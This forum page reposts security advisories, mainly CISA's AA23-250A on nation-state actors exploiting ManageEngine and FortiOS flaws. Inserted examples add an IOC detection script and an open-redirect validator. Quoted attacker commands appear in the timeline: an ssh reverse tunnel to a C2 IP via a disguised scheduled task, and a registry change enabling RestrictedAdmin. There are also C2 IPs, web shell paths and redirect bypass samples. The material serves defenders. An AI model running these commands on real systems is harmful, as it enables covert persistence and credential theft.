
Topics - Netwörkheäd

#1
Cisco Identity Services Engine RADIUS Denial of Service Vulnerability

A vulnerability in the RADIUS message processing feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause the affected system to stop processing RADIUS packets.


This vulnerability is due to improper handling of certain RADIUS accounting requests. An attacker could exploit this vulnerability by sending a crafted authentication request to a network access device (NAD) that uses Cisco ISE for authentication, authorization, and accounting (AAA). This would eventually result in the NAD sending a RADIUS accounting request packet to Cisco ISE. An attacker could also exploit this vulnerability by sending a crafted RADIUS accounting request packet to Cisco ISE directly if the RADIUS shared secret is known. A successful exploit could allow the attacker to cause the RADIUS process to unexpectedly restart, resulting in authentication or authorization timeouts and denying legitimate users access to the network or service. Clients already authenticated to the network would not be affected.


Note: To recover the ability to process RADIUS packets, a manual restart of the affected Policy Service Node (PSN) may be required. For more information, see the Details section of this advisory.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radius-dos-W7cNn7gt



     
         
Security Impact Rating: High
CVE: CVE-2023-20243
Source: Cisco Identity Services Engine RADIUS Denial of Service Vulnerability
#2
Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475


SUMMARY


The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 (https://nvd.nist.gov/vuln/detail/CVE-2022-47966) to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 (https://nvd.nist.gov/vuln/detail/CVE-2022-42475) to establish presence on the organization's firewall device.


CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.


Download the PDF version of this report: AA23-250A Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 685.14 KB): https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf


For a downloadable copy of IOCs, see: AA23-250A STIX XML (XML, 69.24 KB): https://www.cisa.gov/sites/default/files/2023-09/AA23-250A.stix_.xml





For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see: MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 385.49 KB): https://www.cisa.gov/sites/default/files/2023-09/MAR-10430311.c1.v1.CLEAR_.pdf

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13 (https://attack.mitre.org/versions/v13/matrices/enterprise/). See Tables 3-13 for the APT actors' activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.


Overview


By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization's network via at least two initial access vectors:


  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.

  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization's firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.


APT Actor Activity


Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [T1190 (Exploit Public-Facing Application), https://attack.mitre.org/versions/v13/techniques/T1190/] for initial access to the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.


Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001 (Create Account: Local Account), https://attack.mitre.org/versions/v13/techniques/T1136/001/] named Azure with administrative privileges [T1068 (Exploitation for Privilege Escalation), https://attack.mitre.org/versions/v13/techniques/T1068/]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization's network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.


Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization's firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003 (Valid Accounts: Local Accounts), https://attack.mitre.org/versions/v13/techniques/T1078/003/] from a previously hired contractor, of which the organization confirmed the user had been disabled prior to the observed activity.


Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001 (Indicator Removal: Clear Windows Event Logs), https://attack.mitre.org/versions/v13/techniques/T1070/001/]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.


APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002, https://attack.mitre.org/versions/v13/techniques/T1573/002/] on Transmission Control Protocol (TCP) port 10443 [T1571, https://attack.mitre.org/versions/v13/techniques/T1571/], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:


  • 144.202.2[.]71

  • 207.246.105[.]240

  • 45.77.121[.]232

  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.


  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx

  • c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx

  • c:\inetpub\passwordchange\0LECPNJYRH.aspx

  • c:\inetpub\passwordchange\9ehj.aspx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:


  • 45.90.123[.]194

  • 154.6.91[.]26

  • 154.6.93[.]22

  • 154.6.93[.]5

  • 154.6.93[.]12

  • 154.6.93[.]32

  • 154.6.93[.]24

  • 184.170.241[.]27

  • 191.96.106[.]40

  • 102.129.145[.]232

Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

Table 1: Timeline of APT Actor Activity

Timestamp (UTC) | Event | Description

2023-01-18 11:57:02
Event: Hello World User-Agent string observed in 44 total events. Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi
Description: Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization's web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001 (Application Layer Protocol: Web Protocols), https://attack.mitre.org/versions/v13/techniques/T1071/001/]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005 (Acquire Infrastructure: Botnet), https://attack.mitre.org/versions/v13/techniques/T1583/005/].[1: SID 1:58992, https://snort.org/rule_docs/1-58992]

2023-01-20
Event: Attempts made to export three files; associated with malicious IP 192.142.226[.]153.
Description: APT actors attempted to export [TA0009 (Collection), https://attack.mitre.org/versions/v13/tactics/TA0009/], [TA0010 (Exfiltration), https://attack.mitre.org/versions/v13/tactics/TA0010/] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008 (Masquerading: Masquerade File Type), https://attack.mitre.org/versions/v13/techniques/T1036/008/]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:
  • wo_view_bg.zip (09:06:37 UTC)
  • wo_view_bg1.gif (09:08:11 UTC)
  • wo_view_bg2.gif (09:19:43 UTC)
Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.

2023-01-20 16:51:05
Event: Successful web server exploitation via CVE-2022-47966.
Description: Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.

2023-01-21 06:46:42
Event: Azure local user account with administrative permissions created.
Description: A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.

2023-01-21 06:49:40
Event: LSASS dumped by Azure user.
Description: The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001 (OS Credential Dumping: LSASS Memory), https://attack.mitre.org/versions/v13/techniques/T1003/001/].
Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

2023-01-21 06:50:59
Event: Mimikatz.exe downloaded via ConnectWise ScreenConnect.
Description: The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219 (Remote Access Software), https://attack.mitre.org/versions/v13/techniques/T1219/], [T1588.002 (Obtain Capabilities: Tool), https://attack.mitre.org/versions/v13/techniques/T1588/002/].
Note: ConnectWise ScreenConnect was observed in multiple locations within the organization's environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.

2023-01-21 07:34:32
Event: Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.
Description: Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009 (Obfuscated Files or Information: Embedded Payloads), https://attack.mitre.org/versions/v13/techniques/T1027/009/]. This malware is identified as a variant of Metasploit (Meterpreter).
See MAR-10430311-1.v1 for additional details.

2023-01-21 08:46:23
Event: Mimikatz credential dump files created.
Description: Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003 (OS Credential Dumping), https://attack.mitre.org/versions/v13/techniques/T1003/].

2023-01-21 09:25:58
Event: Legitimate files/applications nmap.exe and npcap.exe downloaded.
Description: Azure user account downloaded nmap.exe [T1018 (Remote System Discovery), https://attack.mitre.org/versions/v13/techniques/T1018/] and npcap.exe [T1040 (Network Sniffing), https://attack.mitre.org/versions/v13/techniques/T1040/] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.
Note: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

2023-01-21 13:56:14
Event: ssh2.zip downloaded by the Azure user account.
Description: APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:
  • install-sshd.ps1 (script)
  • psexec.exe
  • sshd.exe
  • ssh.exe
  • ssh-sk-helper.exe
  • libcrypto.dll
Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [T1133 (External Remote Services), https://attack.mitre.org/versions/v13/techniques/T1133/] and is detailed in the scheduled task below.

2023-01-21 14:31:01
Event: SSH tools downloaded to establish reverse (remote) communication.
Description: Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:
  • c:\windows\system32\ssh-shellhost.exe
  • c:\windows\system32\ssh-agent.exe
  • c:\windows\system32\ssh-add.exe
While the files were not identified as malicious, they were loaded for malicious purposes.

2023-01-21 14:33:11
Event: license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.
Description: license validf scheduled task [T1036.004 (Masquerading: Masquerade Task or Service), https://attack.mitre.org/versions/v13/techniques/T1036/004/] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [T1053.005 (Scheduled Task/Job: Scheduled Task), https://attack.mitre.org/versions/v13/techniques/T1053/005/]:
c:\Windows\System32\ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no

2023-01-21 14:51:49
Event: PsExec executed on the ServiceDesk system.
Description: Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.
APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.
psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc
powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Note: PsExec, a command line utility from Microsoft's Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.

2023-01-21 14:55:02
Event: ProcDump created on the ServiceDesk system.
Description: ProcDump was created within the c:\windows\system32\prc64.exe directory. This was later identified as a method for enumerating running processes/applications [T1057 (Process Discovery), https://attack.mitre.org/versions/v13/techniques/T1057/] and dumping LSASS credentials.

2023-01-21 14:02:45
Event: Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.
Description: Ngrok was used to establish an RDP connection [T1021.001 (Remote Services: Remote Desktop Protocol), https://attack.mitre.org/versions/v13/techniques/T1021/001/], another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.
At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.
Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.

2023-01-24 15:07:18
Event: Apache Log4j exploit attempted against the ServiceDesk system.
Description: APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:
  • 80.85.241[.]15
  • 68.177.56[.]38
  • main.cloudfronts[.]net

2023-01-25 00:17:33
Event: Mimikatz credential dump files created.
Description: One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.
Note: This is a different path and time associated with Mimikatz than listed above.

2023-01-29
Event: HTTP-GET requests sent to C2 IP 92.118.39[.]82.
Description: The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.

2023-02-02 05:51:08
Event: Resource.aspx web shell detected.
Description: Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007 (Command and Scripting Interpreter: JavaScript), https://attack.mitre.org/versions/v13/techniques/T1059/007/] on the OWA server [T1505.003 (Server Software Component: Web Shell), https://attack.mitre.org/versions/v13/techniques/T1505/003/]:
  • c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx
Note: The administrative user's credentials were obtained from the APT actors' collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.
See MAR-10430311-1.v1 for additional details.

2023-02-02 18:45:58
Event: Metasploit service installed.
Description: APT actors installed Metasploit with the following attributes on the organization's domain controller [T1059.001, https://attack.mitre.org/versions/v13/techniques/T1059/001/]:
Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.

2023-02-03 03:27:59
Event: ConfigLogin.aspx web shell detected.
Description: APT actors dropped an additional ASPX web shell on a web server in the following file system location:
  • c:\inetpub\wwwrot\uninet\css\font-awesome\css\ConfigLogin.aspx
See MAR-10430311-1.v1 for additional details.

2023-02-03 15:12:23
Event: wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.
Description: APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [T1587.001 (Develop Capabilities: Malware), https://attack.mitre.org/versions/v13/techniques/T1587/001/]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.
See MAR-10430311-1.v1 for additional details.

2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18
Event: Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.
Description: PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:
  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)
  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)

2023-03-06 06:49:40
Event: Interact.sh
Description: APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046, https://attack.mitre.org/versions/v13/techniques/T1046/].
Destination IP: 103.105.49[.]108

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.

Table 2: Observed Tools Used by APT Actors

Tool | Description | Observation

Mimikatz [2: Mimikatz, https://attack.mitre.org/versions/v13/software/S0002/]
Description: A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
Observation: In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:
These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012 (Query Registry), https://attack.mitre.org/versions/v13/techniques/T1012/], and installed programs.

Ngrok [3: Ngrok, https://attack.mitre.org/versions/v11/software/S0508/]
Description: Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.
In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a], [5: #StopRansomware: Daixin Team, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a], [6: #StopRansomware: LockBit 3.0, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a]
Observation: Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems [T1572 (Protocol Tunneling), https://attack.mitre.org/versions/v13/techniques/T1572/].
Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok's ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.

ProcDump
Description: A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.
Observation: APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.

Metasploit
Description: Metasploit is an open-source penetration testing software.
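As an added triage example (not part of the CISA advisory or the forum post, and not CISA's tooling), the script below runs three of the detection opportunities the advisory gives a defender over constructed sample data: the C2 and exploitation IP addresses, the "Hello World" User-Agent with its /cgi-bin/downloadFlile.cgi URI, the listed web shell paths, and an ssh.exe reverse tunnel of the kind the "license validf" scheduled task ran. It assumes web logs in Apache/nginx combined log format; the sample log lines, file listing and process command lines are constructed, and the tunnel sample uses a documentation IP rather than the one on the page.

```python
"""Added triage example: check constructed samples against the IOCs quoted in AA23-250A above."""
import re

# Indicators copied from the advisory text; they are defanged with "[.]" as on the page.
KNOWN_BAD_IPS = {
    "192.142.226[.]153", "144.202.2[.]71", "207.246.105[.]240", "45.77.121[.]232",
    "47.90.240[.]218", "45.90.123[.]194", "154.6.91[.]26", "154.6.93[.]22",
    "154.6.93[.]5", "154.6.93[.]12", "154.6.93[.]32", "154.6.93[.]24",
    "184.170.241[.]27", "191.96.106[.]40", "102.129.145[.]232", "92.118.39[.]82",
    "179.60.147[.]4", "104.238.234[.]145", "108.62.118[.]160", "193.142.146[.]226",
    "80.85.241[.]15", "68.177.56[.]38", "103.105.49[.]108",
}
KNOWN_BAD_USER_AGENT = "Hello World"            # Mirai-style downloader UA from Table 1
KNOWN_BAD_URI = "/cgi-bin/downloadFlile.cgi"    # URI observed together with that UA
# A subset of the web shell paths listed in the advisory, lower-cased for matching.
KNOWN_WEBSHELL_PATHS = {
    r"c:\program files\microsoft office web apps\rootwebsite\en-us\resource.aspx",
    r"c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx",
    r"c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx",
    r"c:\inetpub\wwwroot\wss\virtualdirectories\portal80\_vti_pvt\services.aspx",
    r"c:\inetpub\passwordchange\9ehj.aspx",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator ("1.2[.]3[.]4") back into a matchable value."""
    return ioc.replace("[.]", ".")


BAD_IPS = {refang(ip) for ip in KNOWN_BAD_IPS}

# Apache/nginx combined log format (assumed log layout for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def scan_web_log(lines):
    """Return (line_no, reason, value) for every indicator hit in a web access log."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skipped here; in production count these so a parser gap is noticed
        ip, uri, ua = m["ip"], m["uri"], m["ua"]
        if ip in BAD_IPS:
            findings.append((n, "known C2/exploitation IP", ip))
        if ua == KNOWN_BAD_USER_AGENT:
            findings.append((n, "Mirai-style User-Agent", ua))
        if uri.split("?", 1)[0] == KNOWN_BAD_URI:
            findings.append((n, "downloader URI", uri))
    return findings


def scan_file_paths(paths):
    """Return the paths that match a web shell location named in the advisory (case-insensitive)."""
    return [p for p in paths if p.replace("/", "\\").lower() in KNOWN_WEBSHELL_PATHS]


# ssh(.exe) invoked with -R: a reverse tunnel like the "license validf" scheduled task command.
# The leading group keeps "sshd.exe" and names that merely contain "ssh" from matching.
SSH_REVERSE_TUNNEL_RE = re.compile(r"(?:^|[\\/\s])ssh(?:\.exe)?\s.*\s-R\s", re.IGNORECASE)


def scan_process_cmdlines(cmdlines):
    """Return command lines that start an SSH reverse tunnel."""
    return [c for c in cmdlines if SSH_REVERSE_TUNNEL_RE.search(c)]


# --- Constructed sample inputs (not real telemetry) ---
SAMPLE_WEB_LOG = [
    '10.0.0.5 - - [18/Jan/2023:11:57:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '92.118.39.82 - - [18/Jan/2023:11:57:02 +0000] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 0 "-" "Hello World"',
    '192.142.226.153 - - [20/Jan/2023:16:51:05 +0000] "POST /login HTTP/1.1" 200 1024 "-" "python-requests/2.28"',
]
SAMPLE_FILE_LISTING = [
    r"C:\inetpub\wwwroot\uninet\css\font-awesome\css\font-awesome.min.css",
    r"C:\inetpub\wwwroot\uninet\css\font-awesome\css\ConfigLogin.ashx",
    r"C:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx",
]
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\ssh.exe -N -f -R 12100 user@203.0.113.10 -p 443 -o StrictHostKeyChecking=no",
    r"C:\Windows\System32\ssh.exe admin@fileserver.internal",
    r"C:\Windows\System32\sshd.exe -R",
]

if __name__ == "__main__":
    for hit in scan_web_log(SAMPLE_WEB_LOG):
        print("web log line %d: %s -> %s" % hit)
    for path in scan_file_paths(SAMPLE_FILE_LISTING):
        print("web shell path:", path)
    for cmd in scan_process_cmdlines(SAMPLE_CMDLINES):
        print("reverse tunnel:", cmd)
```

The IP and path matches are exact, so they only catch the infrastructure named in this advisory; the User-Agent and `ssh -R` checks are behavioural and will also flag unrelated activity of the same shape, which is the point of running them alongside the IOC list. Hits on the ssh check in particular deserve a look at the scheduled task that launched the process.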


#3
Cisco HyperFlex HX Data Platform Open Redirect Vulnerability

A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.


This vulnerability is due to improper input validation of the parameters in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.



Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-redirect-UxLgqdUF


     
         
Security Impact Rating: Medium
CVE: CVE-2023-20263
Source: Cisco HyperFlex HX Data Platform Open Redirect Vulnerability
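The advisory above describes the open redirect class (a redirect target taken from an HTTP request parameter without enough validation) but not the affected code. As an added, generic example that is not Cisco's code and says nothing about how HyperFlex validates its parameters, the function below shows the allow-list check a web application should apply to a redirect parameter, including the variants that commonly slip past naive "does it start with a slash" or "does it contain our hostname" tests. The host name and the sample parameter values are constructed.

```python
"""Added example: allow-list validation of a redirect target (generic, not Cisco's code)."""
from urllib.parse import urlsplit

# Hosts the application may legitimately send a browser to (constructed value).
ALLOWED_HOSTS = {"hx.example.internal"}


def is_safe_redirect(target: str, allowed_hosts=frozenset(ALLOWED_HOSTS)) -> bool:
    """True only if `target` is an absolute path on this site or a URL on an allow-listed host."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False                      # header-injection / truncation characters
    # Browsers treat "\" like "/" in the authority part, so normalise before parsing;
    # otherwise "/\evil.example" would parse as a harmless-looking path.
    normalized = target.replace("\\", "/")
    try:
        parts = urlsplit(normalized)
    except ValueError:
        return False                      # malformed IPv6 literals and similar
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False                      # javascript:, data:, vbscript: and friends
    if parts.netloc:
        # .hostname is what follows any "user:pass@" prefix and drops the port, so
        # "https://hx.example.internal@evil.example/" resolves to evil.example here.
        return parts.hostname in allowed_hosts
    # No authority part: accept an absolute path ("/x") but never a
    # protocol-relative "//host", which the browser would resolve to another site.
    return normalized.startswith("/") and not normalized.startswith("//")


def choose_redirect(target: str, default: str = "/") -> str:
    """Use the requested target when it passes validation, otherwise a fixed landing page."""
    return target if is_safe_redirect(target) else default


# Constructed parameter values as they might arrive in a "next"-style query parameter.
SAMPLE_TARGETS = [
    "/dashboard",                                   # safe: absolute path on this site
    "https://hx.example.internal/login",            # safe: allow-listed host
    "//evil.example/phish",                         # protocol-relative URL
    "/\\evil.example/phish",                        # backslash variant of the above
    "https://hx.example.internal@evil.example/",    # allow-listed name in the userinfo part
    "javascript:void(0)",                           # script scheme
    "https://evil.example/?from=hx.example.internal",  # allow-listed name only in the query
]

if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        print(f"{t!r:52} -> {choose_redirect(t)!r}")
```

The design choice worth noting is that the check is structural (parse, then compare the host component) rather than a substring or prefix test on the raw string: each of the rejected samples contains the trusted host name or a leading slash, which is exactly what a string-based check would have accepted.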
#4
Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Authentication Bypass Vulnerability

A vulnerability in the single sign-on (SSO) implementation of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to forge the credentials required to access an affected system.


This vulnerability is due to the method used to validate SSO tokens. An attacker could exploit this vulnerability by authenticating to the application with forged credentials. A successful exploit could allow the attacker to commit toll fraud or to execute commands at the privilege level of the forged account. If that account is an Administrator account, the attacker would have the ability to view confidential information, modify customer settings, or modify settings for other users. To exploit this vulnerability, the attacker would need a valid user ID that is associated with an affected Cisco BroadWorks system.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-auth-bypass-kCggMWhX



     
         
Security Impact Rating: Critical
CVE: CVE-2023-20238
Source: Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Authentication Bypass Vulnerability
#5
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells


SUMMARY


Update September 6, 2023:

